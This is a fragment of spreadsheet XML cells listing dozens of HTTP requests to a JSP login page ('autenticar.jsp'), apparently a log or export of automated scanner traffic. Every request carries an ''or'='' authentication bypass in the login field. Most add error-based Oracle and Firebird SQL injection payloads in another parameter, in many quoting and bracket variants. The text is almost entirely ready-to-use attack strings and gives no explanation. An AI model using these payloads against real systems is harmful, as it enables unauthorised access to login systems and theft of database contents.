    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4945")))or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((("bnll"like"bnll&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1528&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3172"or7272=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(7272=7272)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and"mrzb"like"mrzb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7148&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2704)or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5493&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4704')or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8294&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2100'or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5001&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7415"or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-34&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7483)or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(5630=5630&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5392&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8400))or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((2269=2269&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6139&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7258)))or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(((2629=2629&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3753&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3850or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7679&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6587')or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and('lpix'='lpix&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6191&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4669'))or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(('ivzh'='ivzh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-581&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6148')))or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((('iugk'='iugk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5239&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-41'or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and'tpye'='tpye&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6153&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-493')or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and('vdhi'like'vdhi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4258&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7637'))or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(('anmk'like'anmk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4159&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2092')))or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((('ifbs'like'ifbs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9247&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8192'or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and'ietf'like'ietf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6789&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7853")or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and("fjsl"="fjsl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5078&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1841"))or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(("anej"="anej&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9053&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1962")))or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((("nhbn"="nhbn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1963&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-642"or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and"ooae"="ooae&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7732&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2490")or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and("lcwf"like"lcwf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6951&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3109"))or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(("xkji"like"xkji&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8539&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4143")))or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((("vevp"like"vevp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4704&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6463"or4089=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(4089=4089)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and"hoqr"like"hoqr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8378&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9090)or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1118&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4170')or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3674&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2831'or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9324&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3847"or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8632)or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(2402=2402&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4231))or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((5633=5633&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9522&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8398)))or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(((2217=2217&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3430&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7328or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8129&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9727')or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and('vjhu'='vjhu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9436&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9693'))or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(('qbrm'='qbrm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-422&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1801')))or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((('tfkl'='tfkl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3278&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2926'or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and'sitc'='sitc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3019&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6415')or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and('onum'like'onum&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3747'))or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(('jmrd'like'jmrd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7324&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1035')))or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((('jfcx'like'jfcx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4008&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6454'or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and'momz'like'momz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-528&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4000")or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and("hstr"="hstr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9750"))or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(("iejs"="iejs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8484&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7211")))or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((("gtje"="gtje&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3971&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2879"or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and"kckv"="kckv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6692&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2901")or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and("ckkp"like"ckkp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2256&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7696"))or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(("raqk"like"raqk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-217&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1591")))or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((("eyru"like"eyru&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2581&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2504"or9354=ctxsys.drithsx.sn(9354,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(9354=9354)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and"lvgg"like"lvgg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2107)or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5185&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2823')or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9332&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4467'or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5422&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4791"or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7550&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6726)or1837=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase1837when1837then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(2350=2350&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2247&amp;modo=entrar</t>
  </si>
  <si>
